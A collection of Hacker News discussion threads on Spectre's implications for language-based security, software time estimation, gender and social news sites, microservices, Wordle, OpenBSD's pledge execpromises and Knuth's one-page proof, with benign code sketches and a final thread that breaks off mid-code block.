It's not correct to say "mathematically they should not be possible given the
semantics of Javascript" and then say that "practically they work" as if
implying that the mathematics somehow broke down.
It's not the mathematics that failed you, but the assumptions (axioms) you've
used. Mathematically they are absolutely possible -- when you correctly
account for the real processor behavior. And if you had mathematically modeled
the whole "JS semantics + CPU behavior" accounting for Meltdown, mathematics
would have shown that it's not safe.
------
nine_k
Spectre has nothing to do with program correctness or safety. It has
everything to do with _hardware's_ correctness and safety.
That is, the basic premise of hardware process isolation is that a process
cannot have any knowledge of what another process is doing, or whether it even
exists, unless it is explicitly permitted (e.g. the OS offers an API to look
at processes).
This basic premise is now broken: enough information leaks via timing to
allow reading of arbitrary memory regions. It's like you built a house laying
bricks in a formally correct way, but the walls proved to be permeable because
the bricks themselves have a flaw.
Since this flaw is not fundamental, that is, not even every currently existing
processor exhibits it, it appears to be reasonable to replace the flawed
design of the bricks, and not to re-engineer house construction.
There is a nice quote in the article, about doing basic science to find out
how software (and hardware) _actually_ works, since specs are badly
incomplete. It can be matched with another, earlier famous quote: "Beware of
this code; I only proved it correct, I did not test it." Black-box testing of
information systems is not going anywhere, formal methods or not; at the very
least, we need evidence that formal methods were not visibly mis-applied, and
also evidence that other basic premises, like those of hardware, still hold.
Because sometimes they don't.
~~~
ajross
> Spectre has nothing to do with program correctness or safety. It has
> everything to do with hardware's correctness and safety.
Yes, but safety is safety. The point of the article is that the assumption on
the part of language nerds for the past few decades -- that correct choice of
processes and implementation patterns as expressed by whatever favorite
runtime the author wants can protect us from security bugs -- turns out to be
_FALSE_.
Rust and Haskell programs are subject to Spectre attacks just as badly as K&R
C ones from 1983. All that pontification didn't actually work!
The point is that it puts a limit on pedantry about "correctness". That's all
based on an idea about a "computer" being an abstracted device, when it turns
out the real-world machines are in fact leaky abstractions. The lesson to my
ears isn't that you shouldn't use Rust or whatever, but that some humility
about the boundaries of "correctness" would probably be a good idea for many
of the pontificators.
~~~
kibwen
_> All that pontification didn't actually work!_
This is a bit silly. Security is a chain that is only as strong as its weakest
link. For decades we believed that C was the weakest link, and now, with
Spectre, we have discovered (drumroll, please!): nah, C is still the weakest
link. For all the amazingly scary things that Spectre brings to the table,
it's still less scary than Heartbleed and Cloudbleed were.
Don't get me wrong, hardware still sucks (and with Intel and AMD's growing
body of management engine incompetence they may yet overtake C as the weakest
link in the chain) but we will learn from this and get better. In the
meantime, we need to be pushing forward on all fronts: hardware security,
language security, kernel security, application security, network security...
nobody gets to stand still.
~~~
wahern
Long before Heartbleed or Cloudbleed researchers (and presumably attackers)
were using remote timing attacks to extract secret keys:
https://crypto.stanford.edu/~dabo/papers/ssl-timing.pdf
And most big data breaches where information assets are actually stolen
involve services written using "safe" languages, like Java or SQL.
And even if C is the weakest link, all that means is that you're totally
screwed. No amount of Rust will save you when the Linux kernel, your
relational database, and every router between you and the attacker are written
using C or assembly.
At the end of the day, if you want strong security assurances you need to
prove the correctness of all the semantics (of which memory bounds
constraining is but one small aspect) of every piece of software in your
stack, or at the very least all the most critical pieces. And the best tooling
for that is for Ada and C.
------
rwj
The opening line that "The work of engineers used to be about taking small
parts that they understood entirely and using simple techniques to compose
them into larger things that do what they want" is not correct. Emergent
behaviour has always been an issue for complex systems. Just look at the story
behind the Tacoma Narrows Bridge.
Computing is extremely complex, so the issue is probably more acute, but it is
not unique.
~~~
calebm
I agree with you. Engineers of physical things don't fully understand what
steel is made of (since we don't fully understand the lowest underpinnings of
matter or all of its properties).
------
musha68k
OK so do we finally get proper lisp machines now?
~~~
SomeHacker44
Lisp machines (at least, Symbolics Lisp Machines which I know well) didn't
suffer from these flaws. They were largely designed to be single-user machines
and there was literally almost no isolation between anything!
~~~
AnimalMuppet
But weren't Symbolics Lisp Machines from an era where _nothing_ suffered from
these flaws, because nothing did speculative execution?
~~~
SomeHacker44
As far as I know, this is true for the Symbolics Ivory CPUs, yes. That said,
these flaws would be irrelevant, if so, because the system built upon the
hardware did not enforce modern process isolation paradigms.
------
agentultra
Security by proof, model checking, semantics is still a good, effective tool!
Leveraging the type system is a good communication channel for programmers
maintaining the system.
Proofs and models of the protocols are still important.
But yes... we still need to fix CPUs. And the class of errors (those of
omission) are still worth removing from our code regardless of spectre or
meltdown.
------
realandreskytt
Security is an emergent property of a system consisting of users, software and
hardware. Thus, a programmer cannot prove security of a system but merely
assert its certain behaviour. Langsec does just that. No, it can never be used
to build secure systems. Yes, it can be used to solve practical problems
making things more secure.
------
chubot
The author of this post isn't properly characterizing langsec:
_The basis of language security is starting from a programming language with
a well-defined, easy-to-understand semantics. ... This approach is taken, for
example, by Google 's Caja compiler to isolate components from each other,
even when they run in the context of the same web page._
From what I can tell, he's talking about the broader area of "programming
languages and security". That is not the same thing as
[http://langsec.org/](http://langsec.org/), which is essentially about using
grammars to recognize network PROTOCOL formats.
As far as I remember, one motivating vulnerability is that there were two
different parsers for SSL certificates, which allowed attackers to trick
browsers into accepting invalid certificates. That doesn't have anything to do
with programming languages per se; you can write this vulnerability in any
language. It's analogous to the fact that using a safe language doesn't
prevent you from SQL injection.
Some examples of what they are trying to address:
[http://langsec.org/papers/langsec-cwes-
secdev2016.pdf](http://langsec.org/papers/langsec-cwes-secdev2016.pdf)
I wrote a critique of langsec a few months ago here:
[https://lobste.rs/s/uyjzjc/science_insecurity_meredith_l_pat...](https://lobste.rs/s/uyjzjc/science_insecurity_meredith_l_patterson#c_pzjzxh)
tl;dr I think they are using the wrong formalisms.
I found it odd that the author was assuming that langsec is a widely used
thing when I think it is nascent research.
Even Google Caja, a totally different project outside of langsec, is not
widely deployed, although I very much like its ideas.
~~~
maradydd
Just FTR, your critique is answered by Stefan Lucks, Norina Grosch, and Joshua
Koenig's paper[0] from last year's langsec workshop at IEEE Security and
Privacy. They define a formalism, calc-regular languages, to handle length-
prefixed strings.
[0] [http://spw17.langsec.org/papers.html#calc-
regular](http://spw17.langsec.org/papers.html#calc-regular)
~~~
chubot
Thanks, this looks promising! I'll take a look.
------
titzer
Hi Andy, thanks for writing this.
I don't think we are fundamentally hopeless for "langsec", although history
will definitely be divided into two Epochs: a time before Spectre and a time
after.
Language runtimes and operating systems just got some really great new
research problems, and a lots of interesting ideas are afoot (many in V8
land).
~~~
UncleMeat
There is no way that this is true. The program analysis community has known
for decades that systems were only ever sound w.r.t. some assumptions. See
Andrew Appel's paper on breaking Java safety with McDonald's heat lamps from
like a decade ago for a fun example.
Basically every static analysis person I've talked to about this agrees that
it is a really really cool attack but that it doesn't represent fundamental
new information for the field.
------
stmw
I think there is a deeper truth here - understanding of what the hardware is
doing has always been essential for writing correct, secure, performant
programs - and it is the (IMHO, mistaken) ideology that this is not the case
that took the biggest hit from Spectre/Meltdown/et al.
------
kibwen
_> One manifestation of the Spectre vulnerability is that code running in a
process can now read the entirety of its address space, bypassing invariants
of the language in which it is written, even if it is written in a "safe"
language. This is currently being used by JavaScript programs to exfiltrate
passwords from a browser's password manager, or bitcoin wallets._
Isn't this incorrect? I thought it was Meltdown, not Spectre, that was being
used to read the browser's password manager from JavaScript, and that Spectre-
via-Javascript was limited to reading data within the same JS VM process (so
e.g. you could prevent Spectre from reading cookies by making them http-only).
This matters because Meltdown is much easier to patch than Spectre.
------
workthrowaway27
This is like saying a compiler bug in a safe language ends langsec. Which is
obviously absurd. It means the implementation had a flaw, but that doesn't
make the whole thing worthless. And when the flaw is fixed the same guarantees
are restored.
~~~
madez
The problem is that what you call guarantees weren't guarantees to begin with,
and we can't be sure they are now.
~~~
workthrowaway27
That's true about any engineering artifact though. If your steel rebar isn't
built to whatever standard you require your concrete skyscraper isn't going to
be structurally sound. To build on top of the layers below you, you have to
trust that they work, and when problems occur you fix the problems as they
come up (or ideally prevent them ahead of time).
------
ngneer
I am not seeing the connection to LANGSEC. The Spectre and Meltdown attacks
turn the processor into a confused deputy, that is all. If anything, this is
predicted by LANGSEC. The beef is not even with hardware verification, as some
have suggested, because the specification never calls for such security
guarantees. The specification is architectural because we want different
processors to implement the same architecture, such that they are compatible.
The only reason transient instruction sequences have security-violating side
effects is microarchitectural leaks.
------
tannhaeuser
I think concluding the "end of langsec" goes too far. We'll continue to need
both langsec, plus much more thorough hardware verification to re-establish
basic isolation assumptions lost with Spectre/Meltdown (or push for detailed
HW specs to begin with, to be able to assert these assumptions on our own).
OTOH, as if it wasn't obvious enough already, I'm seeing a serious issue with
the concept of executing arbitrary code from untrusted network locations, such
as with JavaScript on the Web.
------
juancn
The failure lies in forgetting that computers are not deterministic machines;
they are probabilistically deterministic machines instead.
They are physical constructs, not mathematical ones, and as such, verification
is inescapable if you want some level of assurance. You need tolerances and
experimentation after construction, even if you proved your thing correct.
In the words of Knuth: "Beware of bugs in the above code; I have only proved
it correct, not tried it."
------
crb002
The major chip manufacturers need to have two kinds of cores/caches. One that
has full security guarantees, the other that is optimized for energy
efficiency/performance and has zero interprocess security. This isn't a
one-size-fits-all problem.
~~~
zzzcpan
I see some people assume that a single chip that can do both is not an
option. It is. It's only x86 that has to do everything in hardware and
hide everything from the user for backwards compatibility.
Imagine instructing a compiler for an architecture that does everything in
software, like Mill, to make every operation constant time or to speculate
aggressively and unsafely depending on what the program needs.
------
KaiserPro
Even on the Arduino I don't think I could claim that I knew 100% what was
going on, let alone go/python/JS -> kernel -> docker/VM -> kernel ->
processor.
------
fnord77
meh.
reasoning always loses out to empirical techniques anyway.
------
jezfromfuture
Buy a new CPU that is fixed and the problem is gone. Maybe we shouldn't change
the world; maybe Intel should fix their own problem. If a car has a serious
fault that makes it dangerous, it's recalled. It's time for Intel to do the
same.
How can you estimate time for something you've never done before? - rbsn
How can you estimate time for something you've never done before? It could be a feature you've never written before or one which you are not sure is even possible?
======
aidos
It's a complicated business. More than anything I'm very honest about the
uncertainty these days. I also try to give ranges for things - instead of
saying it will take about 2 days (which cements a specific deadline), say, 2 -
4 days.
As you get older (more experienced) you become less concerned with
overestimation. When you're young and ambitious you think that a) you can do
it faster than you really can and b) it's bad to say it'll take 2 days when
really you _think_ you can do it in 1. a) you can't and b) people don't
normally question your overestimates.
Also, try to think things through. Ask questions. Discover those subtle
missing requirements that haven't been communicated yet. Try to picture how it
will fit into the system and imagine why that might go wrong. If it's a bigger
feature break it into parts and (over)estimate each of those.
Be _thoughtful_ , _overestimate_ and be _honest_ (especially with yourself).
------
daven11
I use a very simple version of function point analysis. Write down all the
different things you know you need to do, beside each one write easy, medium
or hard. easy takes 0.5 to 1 day, medium 2-3 days, hard 3-5 days. If you think
any bits are very hard then break it down - if you can't then you've found
something you don't know - and you have to focus on that - this is a risk and
flag it as such.
If it's a big project then chop it up into deliverables, so you can monitor
your estimates along the way.
..there's a lot more but something to get you started.
(if you have to deliver on your estimate - double it :-). When you double your
estimate - make sure you don't work to your doubled estimates - otherwise
you'll have to double it again :-) )
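The scheme above can be sketched as a small program. This is only an illustration of the comment's rules of thumb (the day ranges and the "double it" rule); the names are made up:

```c
#include <stddef.h>

/* Per-task ranges from the comment: easy 0.5-1 day, medium 2-3, hard 3-5. */
enum task_size { EASY, MEDIUM, HARD };

static const double LOW_DAYS[]  = {0.5, 2.0, 3.0};
static const double HIGH_DAYS[] = {1.0, 3.0, 5.0};

/* Sum per-task ranges into a low/high total; optionally apply the
 * "if you have to deliver on your estimate, double it" rule of thumb. */
void estimate(const enum task_size *tasks, size_t n, int must_deliver,
              double *low, double *high)
{
    *low = 0.0;
    *high = 0.0;
    for (size_t i = 0; i < n; i++) {
        *low  += LOW_DAYS[tasks[i]];
        *high += HIGH_DAYS[tasks[i]];
    }
    if (must_deliver) {
        *low  *= 2.0;
        *high *= 2.0;
    }
}
```

Reporting the result as a range (e.g. "5.5-9 days") rather than a single number keeps the uncertainty visible, which is the point of the method.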
------
EnderMB
I work at an agency using ASP.NET, so I find myself regularly estimating for
projects and small jobs. The biggest issue with our clients is that they will
always argue how long things will take. One of our large clients has an SEO guy
in one of their offices that has "11 years web experience" (despite not
programming professionally for the best part of three years, and seemingly
knowing very little about programming or how the Internet works) and he will
frequently argue every small cost. We quoted two hours to modify a form used
across eleven country-specific sites for one specific use case on a single
site, and he went crazy, stating that it'd take him "twenty seconds in PHP". A
bit of Googling shows that this guy hacks a bit of PHP in his spare time, but
can't code for shit, and given his position at the company it's not really up
to him to dictate price.
Anyway, the only way to give a valid estimate is to break down the task as
much as you possibly can and to assign risk to each small task. Build a
spreadsheet and break down every task into the smallest possible unit, and
assign a risk rating to it. Any tasks that are high risk should be estimated
as a range, rather than a fixed time. Even with this advice you'll still get
things wrong, but it's impossible not to. It's the nature of estimating.
The best advice I can give you is to stick to your guns and estimate for how
long it will take YOU to do a task. If people still argue, then tough. As
rightly pointed out by aidos, more experienced devs/PMs will happily
overestimate and will fight their corner to say that this is how long a task
takes. If you are honest with yourself on how long a task will take then you
will find it much easier to stick to your guns when someone complains that
"an easy task" shouldn't take as long as you've said.
------
shanelja
_Over_ estimate.
Yesterday I was asked to integrate Sendgrid with our analytics server over
cURL in a cronjob.
Not only had I never used Sendgrid before or even seen the codebase for our
analytics server, I've never used cURL Multi before - so I was walking in
knowing nothing.
I said it would take me "about 2 days", which seemed "fair" to my manager, in
the end it only took me about 5 hours, so they were happy to get it early and
I had all the debug time I needed.
~~~
rbsn
I try to overestimate, but then I worry that I may be seen as wasting time or
being grossly inefficient. Obviously there is a balance. This is something I
worry about much.
~~~
arxanas
If you get work done before the due date, how could it be seen as inefficient?
~~~
rbsn
My problem is that if I say it would take me 2 weeks and my colleague says he
can do it in just one - though I am overestimating, he will most likely seem a
better, more efficient employee.
~~~
kohanz
If they consistently estimate less effort than you do AND they consistently
deliver on those estimates, then they ARE more efficient. However, you will
find in most cases that the people who give lower estimates tend to miss
deadlines more often too.
------
sharemywin
Break it into smaller pieces that you can estimate. Is there something that is
similar? You can always say let me research a little bit to get you answer. In
engineering/technology it better to under commit and over deliver. In business
it's better to over commit and work your ass off.
------
pagade
Remember and remind - Hofstadter's Law: It always takes longer than you
expect, even when you take into account Hofstadter's Law.[1]
[1] <http://en.wikipedia.org/wiki/Hofstadter%27s_law>
------
VikingCoder
Remember the first rule of data:
Never gather it, until you know how it's going to be used.
Who is asking you to estimate, and what are they going to do with those
numbers?
Until you explore and understand the answers to those kinds of questions, it's
irresponsible to try to satisfy the request.
If you like the answers you get, then give the best data you can. If the
answers you get suck, then you need to try to change how people are behaving.
If you can't, then maybe you need a new job.
| {
"pile_set_name": "HackerNews"
} |
5 Reasons Why I Want Digg for Girls - estherschindler
http://www.heartlessdoll.com/2008/10/5_reasons_why_i_want_digg_for_girls.php
======
pavel_lishin
I'm a guy, and I couldn't care less about the NBA, Howard Stern, or James Bond
trivia without spraining something.
What exactly IS "girl stuff"? The article didn't mention a single example of
what a "girl link" is, except jokingly mentioning a few sexist ideas.
~~~
jsdalton
I'll give you my opinion here: It's not so much about the content, as it is
about the community that evolved around the content.
For me, Hacker News is a great example of this. Why do we need Hacker News
when we've already got Proggit (i.e. the Programming sub-Reddit)? Truthfully,
Reddit's social news technology is more advanced than HN, and there's a lot
more people and stories there. Right?
As you'll probably agree...no, not exactly. What sets HN apart (for now) is
that it's smaller, more serious, and arguably more intelligent than Reddit's.
I see the same links posted here as I do on Reddit; the key difference is the
conversations that ensue and in particular the tone of those discussions.
This is long-winded way of saying "girl stuff" isn't about having gossip and
fashion articles, but more about a culture evolving around those stories. I do
think that the male-dominated culture surrounding sites like Digg, Reddit, and
even HN can be off-putting to women.
~~~
Frabjous-Dey
I think you hit the nail on the head. Social news sites are only worthwhile
insofar as your interests and participation align with the interests and
participation of your peers on the site.
The author is really saying two things:
\- "I'm not interested in the articles that make the front page of Digg": a
terrific reason not to use Digg.
\- "If women had a Digg of their own, the articles on it would be much more
relevant to me." Probably somewhat true. But I know plenty of female geeks who
wouldn't give a shit about anything on weheartgossip or kirtsy.
The real goal here is to find a quality community that appeals to you.
Unfortunately, this is not all that easy: not only are most people morons, you
need a lot of people to be active in the same place for a social website to be
worth visiting.
~~~
jsdalton
I do think getting the communities to form is a challenge, and I think the
challenge is even more difficult amongst non-nerd demographics.
I actually set up a slinkset site, <http://www.bababase.com>, a few months ago
based on the very premise we're discussing, but I've had a tough time finding
a way to get traction amongst a non-nerd crowd! (Moms, in this case.)
~~~
dgabriel
Moms are _incredibly_ active on the web. All you need to do is get in with the
"Mommy Blogger" crowd, which is quite large and influential, and tends towards
activism.
iVillage is filled with moms, as are wahm message boards, etc., etc. Your
audience is there, and they want what you've got, I'm sure.
~~~
jsdalton
You're totally right, and I appreciate the encouragement actually.
I'm really not the world's most phenomenal marketer or community organizer. It
takes a lot of those two competencies to be successful in a social application
endeavor. :/
------
dgabriel
Hmm. As a girl, I _am_ interested in stuff like the following. My issues have
never been with links, but with idiotic commentary on links.
_Instead, I'm stuck reading headlines like "Compressed Air Cars Coming To New
Zealand" and "New maskless lithography trick may keep Moore's Law on track."_
~~~
DaniFong
Digg commentary is at times, physically painful for me to read. Like someone
punched me in the gut. What stupidity and ignorance. What a cesspool.
What is it about certain internet places that make people so awful? Anonymity?
Or are there people actually that bad all around me, in real life, and I
simply don't notice?
~~~
dgabriel
I don't think these people really believe what they're saying, but it's very
easy to let the Id take over when your name and reputation aren't on the line.
All these young boys want to be the class clown, without the unfortunate
ramifications, and Digg is the perfect outlet.
I think this is why HN tends to be more civil and worthwhile -- you have
active editors, and most people use their real names as their usernames or in
their bios.
ps - her crack about compressed air cars must have really hurt...
~~~
DaniFong
Yeah, it did. "Screw the environment. Those things are only interesting
because of internet Male's bizarre fascination with them. Instead, let me
write about whether Barack Obama is anorexic?! That's what _real_ girls want
to hear about..."
Not going to let it keep me down, though. We just sent out a bunch of letters
to investors. Lo and behold, we now have a pitch.
~~~
cgranade
Just who are these mythical girls that are only interested in such tripe,
anyway? I've never met one...
~~~
DaniFong
I don't know many either. My theory is that the interests of many were formed
and set in cliques in high school, which I wasn't around to see. The few
people I know now who are interested in such things _also_ enjoy science and
technology and art.
You know the phrase 'six degrees of separation?' I feel like it must be at
least three or four. I have little to no contact with these people, even
though they're all around me. I felt similarly when I went to a baseball game,
once. Wow.
~~~
cgranade
I never went to high school, so I never really grokked that kind of clique
behavior. I mean, cliques can be good as they help us organize vast social
networks, but I've been told they go way overboard in that environment.
Even though I have never been to a sports game (excepting a Harlem
Globetrotters show, but that wasn't really a game), I kind of feel the same
way walking around my hometown of Fairbanks. The population is small enough
that I likely have no more than two or three degrees between myself and any
random stranger. It's a very odd feeling, and one that I've never gotten used
to.
------
Alex3917
I don't know how Slashdot did it, but "insightful / informative / interesting
/ funny" seem to be exactly the four qualities that can make a piece of text
good. If you either added a bucket or took a bucket away, the signal to noise
ratio would go down. At least from my perspective. But maybe women have
different buckets, or have a different optimal blend of how much should fall
into each bucket.
edit: My proposed mechanism for this is that the pattern matching in women's
brains is less strict than the pattern matching in men's brains (i.e. women
see patterns more easily), which for women blurs the line between interesting
and insightful. But I don't actually have any credible evidence to support
this, so take it for what it's worth.
~~~
mseebach
Successful niche forums/boards have a social contract that the participants
enforce on each other. The fact that you on HN need x1 points to vote comments
down, and x2>>x1 points to kill stories (and on Slashdot, the karma-system),
ensures that new members are accepted into the contract by peers based on
contribution.
In older times, boards had moderators, and admins picked out active members as
mods based on their performance.
But this model is susceptible to group-think, especially when a topic falls
outside the contract. It just happened here during the presidential election
that apparently the body of users are sufficiently politically diverse, that
intelligent, respectful debate prevailed over mindless up-voting of anything
adhering to one specific mindset. It could very well have gone in the other
direction. There's absolutely no guarantee that because someone makes
insightful tech/startup comments, he is also going to vote down a stupid
comment, even if it's in favor of his political POV.
Solving this problem; making sure that a community like HN can stay
intelligent, and not be diluted as it gains popularity, I think, is a very big
opportunity.
~~~
estherschindler
I, for one, miss the social contract. But then I was a CompuServe sysop by
1990, and ran several types of online discussion groups (including
ZDNet/AT&T's InterChange, which nobody else remembers). There was incredible
value in the people who owned a stake in the forum's success (particularly
anything vendor- or company-related) in choosing moderators who knew how to
create a balance between being both barkeep and bouncer
([http://advice.cio.com/esther_schindler/6_stupid_mistakes_com...](http://advice.cio.com/esther_schindler/6_stupid_mistakes_companies_make_with_their_online_communities))--not
the least of which was a sincere welcome to the community.
Even when I haven't been involved in running an online community, I've always
been a participant in several of them. And yes, some women need to feel "safe"
before they will come out of lurkerMode. (Obviously I am not in that set, but
I expect the woman who wrote the blog post to which I linked does count
herself among them.) For instance, I'm a member of two women-in-IT tech groups
(a general one and one specifically for web designers/developers, and believe
me, you can't shut them up). The whole notion of women-in-IT and its
reflection in online communities isn't going to go away just because some guys
(and some women, too) say, "But really, you don't need a separate space."
(As you can probably tell, this is a topic very close to my heart.)
------
0xdefec8
Forget girls; Digg ostracizes anyone who isn't a Male-Liberal-American-
ObamaSupporting-AppleLoving-WebDesigner.
~~~
ryanwaggoner
They make an exception for Ron Paul fanatics, oddly enough.
~~~
Dilpil
The Ron Paul fanatics make an exception for themselves.
------
ATB
Reddit had a spin-off called lipstick.com, which has now become
<http://www.weheartgossip.com/>
There's the 'OMG' reddit alien, replete with blond hair and lipstick:
[http://thumbs.reddit.com/t5_2qh3n_29.png?v=4v4n810ku3an8yqud...](http://thumbs.reddit.com/t5_2qh3n_29.png?v=4v4n810ku3an8yqud5egg2hzlsckf9jp0ztw)
Sadly, it falls into the category of 'what advertisers/editors think women
want in a social networking site.' Based on my own at-work experience with
somewhat/fairly geeky girls (not coders), tmz.com and perezhilton.com already
accomplish what lipstick/weheartgossip seek to do.
------
zearles
There IS a digg for girls: PrettySocial ;-)
<http://www.prettysocial.net/>
Seriously though, there are several such sites with different target groups:
PrettySocial (ours): for young women, focus is on fashion, beauty, health etc.
with lots of pretty pictures!
Kirtsy: for mothers and older women, coverage is more general
Boudica: it's a new site, the stories are a little random, but looks promising
------
ObieJazz
_...the site has a core userbase of boys who spend hours each day posting
stories and Digging stories posted by their friends._
The problem here is that a small core group of users is able to exert undue
influence on the site. If the ranking system on Digg were better balanced, its
featured stories would better represent the interests of its broader (and
presumably more gender-balanced) user base.
------
helveticaman
You can take the source code for hacker news, change the css around, and buy a
fitting domain name.
------
josefresco
Top Headlines from Digg right now:
Oregon Woman Loses $400,000 to Nigerian E-Mail Scam
First Look at Johnny Depp-Mad Hatter in Alice in Wonderland
New honeycomb tire is 'bulletproof'
If TV Shows Had Truthful Titles
Phil Gramm Has No Remorse Over Destroying the US Economy
Chinese pirates crack Blu-ray DRM, sell pirated HD discs
Top 10 Unfortunate Political One-Liners
30 Rare & Expensive Gamecube Games
New MythTV Interface Preview
Mark Cuban charged with insider trading.
Anyone see a male bias there? The Johnny Depp article would actually tip the
scales to the female side in my opinion.
~~~
ATB
Sure, I'll bite.
\- "Oregon Woman Loses 400k to scam" \-- Although it's a story about a woman,
I suspect that the vast majority of the 552 current comments are from men,
making rude, arrogant, or demeaning comments. Men braying like jackasses and
cracking puerile jokes about how dumb someone (a woman) is? What's not to
love?
\- "First Look at Johnny Depp" \-- Skews female
\- "New honeycomb tire is 'bulletproof'" \-- A story about car/bike technology
and guns/bullets. Not to feed any stereotypes here, fellas, but that
positively reeks of testosterone.
\- "If TV Shows Had Truthful Titles" \-- Sophomoric snark on the Internet
_can_ amuse both sexes, but tends to skew male. Perhaps because sophomoric
snark in general skews male. No offense intended.
\- "Top 10 Unfortunate Political One-Liners" \-- Obsessing over political
minutiae/sophomoric snark again, combined with a bit of political trivia? See
above. Or do you think that the relentless Ron Paul stories were also being
constantly up-voted by an enraptured female audience glued to whatever new
tidbit was coming from his camp?
\- "Phil Gramm Has No Remorse Over Destroying the US Economy" \-- See above.
This is a story that could be appealing to both men and women, but the puerile
slant to it makes it slightly less interesting to women, or so I've tended to
notice. Just like in Real Life, your hilarious political jokes just AREN'T
THAT FUNNY to most girls, y'know?
\- "Chinese pirates crack Blu-ray DRM, sell pirated HD discs" \-- DRM nerd
porn. There's no reason why this wouldn't appeal to women, but by and large,
the tone and thrust of the article greatly narrows its (male) audience.
\- "30 Rare & Expensive Gamecube Games" \-- Skews both older and to a more
rarefied hardcore/distinguishing gamer audience. Which is largely male. If it
said 'best Wii games' for instance, it wouldn't be so male-centric.
\- "New MythTV Interface Preview" \-- Nerd porn. See above.
\- "Mark Cuban charged with insider trading." \-- Nerd-slash-financial-slash-
sports porn.
Cue the inevitable comments how you're a woman and those stories _totally_
appeal to you. :-)
~~~
modoc
so... what do you think women who want to use a digg-esque website ARE into?
Most women I know are far more into snarky commentary/comedy than I am, and
are very interested in politics, the economy, and way more into tv than I am,
etc...
------
cabalamat
There's a web app (forget what it's called) that analyses the writing on a web
page and decides whether a man or woman wrote it.
So something like this could be largely automated, start off with a collection
of links then categorise them according to the text on the page and/or the
writing of the person linking to them.
~~~
Alex3917
<http://bookblog.net/gender/genie.php>
It doesn't work well enough for what you're proposing though. The accuracy
(according to their blog) is roughly 50%, which is no better than chance.
------
geuis
There aren't even 5 points in the article. Just the same complaint "I don't
like Digg content" 5 times. She gives examples of what she doesn't like, but
at no point offers examples of the kinds of things she likes. Also, I'm
honestly not sure if the core group of women who would power a site like digg
would be very different than the guys on digg. There's roughly only 1% of digg
users submitting content. Would the 1% of women submit Martha Stewart or Steve
Jobs? I suspect the über geek girl isn't too far from the über geek guy.
------
sil3ntmac
<http://kirsty.com> (used to be called something else, I forget). They talked
about that site when I took a tour of the Houston Technology Center.
------
Dilpil
Of COURSE there is a digg for girls. In fact, of course there are 5. It's
disheartening to realize how much has already been completely done to death.
------
blurry
There _is_ Digg for girls:
boudica.com
~~~
josefresco
Two 'Random' Headlines from Boudica:
Jennifer Lopez wants another baby
The other side of Angelina Jolie
Granted those were 'cherry picked' to make my point, but this Girl-Digg site
seems like the same stuff you'd see inside the popular glossy and rather
crappy women's magazines that are sold in supermarkets and bookstores
nationwide. All that's missing are the "10 Signs Your Husband is Cheating" and
"47 Ways to Lose Weight Fast" articles.
~~~
blurry
I agree Jose, Boudica community seems to cater to the lowest common
denominator. I posted the link not because I like it but because it is
precisely what the poster asked, a Digg for girls.
------
cglee
Here's another: <http://www.kirtsy.com/>
------
mannylee1
Try www.lipstick.com.
------
DanielBMarkham
There are a few -- try <http://www.kirtsy.com/>
------
feverishaaron
kirtsy.com
Microservices – Not A Free Lunch - patrickxb
http://highscalability.com/blog/2014/4/8/microservices-not-a-free-lunch.html
======
lowbloodsugar
"Where a monolithic application might have been deployed to a small
application server cluster, you now have tens of separate services to build,
test, deploy and run, potentially in polyglot languages and environments."
My experience is that it is vastly harder to keep a single application server
running that involved only _two_ teams compared to two teams each with three
or four microservices that they own.
"Keeping an application server running can be a full time job, but we now have
to ensure that tens or even hundreds of processes stay up, don't run out of
disk space, don't deadlock, stay performant. It's a daunting task."
No, see, keeping a giant monolithic application server running is a full time
job.
Author seems to entirely miss the point of microservices. The problems of
giant application servers don't multiply when you break it into microservices.
They go away.
"Developers with a strong DevOps profile like this are hard to find, so your
hiring challenge just became an order of magnitude more difficult if you go
down this path."
High Performance Teams are High Performance Teams. If you don't have one, your
giant monolithic application is also doomed to failure. You just get to
pretend that all the bugs will come out in QA.
------
phamilton
Aminator + Asgard + Simian Army (along with other open source offerings from
Netflix) can get you a lot of the Lunch for Free.
That said, you need to know how to use them and invest significant time and
effort in getting it up and running.
[http://netflix.github.io/#repo](http://netflix.github.io/#repo)
Wordle - Beautiful Word Clouds - raghus
http://www.wordle.net/
======
nreece
An old one.
Here's a Wordle for PG's essays:
[http://www.wordle.net/gallery/wrdl/34828/Paul_Graham's_Essay...](http://www.wordle.net/gallery/wrdl/34828/Paul_Graham's_Essays)
------
jaxn
I used wordle to create a bio of sorts for my Twitter background
<http://twitter.com/jaxn>
OpenBSD pledge(2) “execpromises” - notaplumber
https://marc.info/?l=openbsd-cvs&m=151304116010721&w=2
======
notaplumber
pledge(2): [https://man.openbsd.org/pledge](https://man.openbsd.org/pledge)
"pledge()'s 2nd argument becomes char *execpromises, which becomes the pledge
for a new execve image immediately upon start."
This will eventually be used to improve fork+exec daemons, permitting a
much safer interlock between parent and child.
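A minimal sketch of how a fork+exec daemon could use the new argument. This is OpenBSD-specific (it builds only there), and the exec'd program and the promise strings are illustrative assumptions, not taken from the commit:

```c
#include <err.h>
#include <unistd.h>

int
main(void)
{
	/*
	 * First argument restricts the current process; the new second
	 * argument ("execpromises") becomes the pledge of whatever image
	 * a later execve starts -- it takes effect immediately on exec,
	 * so the child image never runs unpledged.
	 */
	if (pledge("stdio proc exec", "stdio") == -1)
		err(1, "pledge");

	switch (fork()) {
	case -1:
		err(1, "fork");
	case 0:
		/* The exec'd image starts life limited to "stdio". */
		execl("/usr/bin/true", "true", (char *)NULL);
		err(1, "execl");
	default:
		break;
	}
	return 0;
}
```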
Previous mailing list discussions: [https://marc.info/?l=openbsd-
tech&m=151302727506669&w=2](https://marc.info/?l=openbsd-
tech&m=151302727506669&w=2)
[https://marc.info/?l=openbsd-
tech&m=151268831628549&w=2](https://marc.info/?l=openbsd-
tech&m=151268831628549&w=2)
Knuth on Huang's Sensitivity Proof: “I've got the proof down to one page” [pdf] - espeed
https://www.scottaaronson.com/blog/?p=4229#comment-1815290
======
svat
A few random comments:
• Obviously, this is typeset with TeX.
• Though originally Knuth created TeX for books rather than single-page
articles, he's most familiar with this tool so it's unsurprising that he'd use
it to just type something out. (I remember reading somewhere that Joel
Spolsky, who was PM on Excel, used Excel for everything.)
• To create the PDF, where most modern TeX users might just use pdftex, he
seems to first created a DVI file with tex (see the PDF's title “huang.dvi”),
then gone via dvips (version 5.98, from 2009) to convert to PostScript, then
(perhaps on another computer?) “Acrobat Distiller 19.0 (Macintosh)” to go from
PS to PDF.
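That pipeline can be approximated on a stock TeX installation roughly as follows (a sketch; the Distiller step is proprietary, so the free ps2pdf is shown as a stand-in for it, which is an assumption and not what Knuth used):

```shell
tex huang.tex                  # plain TeX -> huang.dvi
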